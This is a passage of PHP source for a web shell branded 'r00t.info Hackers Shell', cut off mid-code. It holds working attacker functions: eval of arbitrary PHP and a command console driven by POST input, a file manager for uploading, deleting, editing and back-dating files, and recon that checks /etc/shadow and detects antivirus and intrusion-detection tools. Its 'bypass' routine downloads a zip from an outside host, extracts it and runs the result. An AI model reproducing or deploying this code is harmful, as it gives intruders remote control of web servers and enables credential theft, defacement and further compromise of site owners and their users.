information</h1><div class=content>\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'<span>\'.$n.\': </span>\';\r\n if(strpos($v, "\\n") === false) echo $v.\'<br>\';\r\n else echo \'<pre class=ml1>\'.$v.\'</pre>\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'<h1>PHP info</h1><div class=content>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'</div><br>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\\'\\\');\r\n}return false;\r\n"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\').\'margin-top:5px;\r\n" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'</pre></div>\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'<h1>File manager</h1><div class=content>\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'<script>document.mf.p1.value="";\r\ndocument.mf.p2.value="";\r\n</script>\';\r\n } $dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]);\r\n } echo \'<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\\'checkbox\\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\\'100%\\\' class=\\\'main\\\' cellspacing=\\\'0\\\' cellpadding=\\\'2\\\'>\r\n <form name=files method=post>\';\r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n } echo \'<tr><td colspan=5>\r\n <input type=hidden name=a value=\\\'FilesMan\\\'>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <select name=\\\'p1\\\'><option value=\\\'copy\\\'>Copy</option><option value=\\\'move\\\'>Move</option><option value=\\\'delete\\\'>Delete</option>\';\r\n if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){echo \'<option value=\\\'paste\\\'>Paste</option>\';\r\n } echo \'</select> \r\n<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" value="r00t.info shell" disabled="disabled"/> \r\n<input type="submit" value="Add Deface Here" disabled="disabled"></td></tr>\r\n </form></table></div>\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$i<strLen($p);\r\n$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));\r\n}return $r;\r\n}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= \'%\'.dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n if(function_exists($_POST[\'p1\'])) echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';\r\ndocument.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n $stringTools = array( \'Base64 encode\' => \'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n\'><select name=\'selectTool\'>";\r\n foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"</pre></div>";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</pre>\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;\r\ncolor:black;\r\n">\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,null,null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.text.value);\r\nreturn false;\r\n"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</textarea><input type=submit value=">>"></form>\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= \' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';\r\n} $h[1] .= \'<br>\';\r\n $h[2] .= "\\n";\r\n } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;\r\n"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.name.value);\r\nreturn false;\r\n"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'<script>g(null,null,null,null,"")</script>\');\r\n else { echo \'Fail!<script>document.mf.p3.value="";\r\n</script>\';\r\n } } else echo \'Bad time format!<script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array("");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push("");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>\';\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';\r\ndocument.cf.cmd.value=\\\'\\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n continue;\r\n } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;\r\n" readonly>\';\r\n if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n } echo \'</textarea><input type=text name=cmd style="border-top:0;\r\nwidth:100%;\r\n" onkeydown="kp(event);\r\n">\';\r\n echo \'</form></div><script>document.cf.cmd.focus();\r\n</script>\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n <!--r00t.info Hackers Shell-->\r\n <!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert("Logout Successful")</script>\r\n <body bgcolor=#ffffff><center><img src="http://r00t.info/shell-dosyalar/logo.png"></center>\r\n <H1><center><p style="color: #DF0101" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src="http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&\r\nwidth=260&\r\ncolorsche\r\nme=light&\r\nshow_faces=true&\r\nborder_color=\r\n%23fff&\r\nstream=false&\r\nheader=false&\r\nheight=100" scrolling="no" \r\nframeborder="0" style="background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n 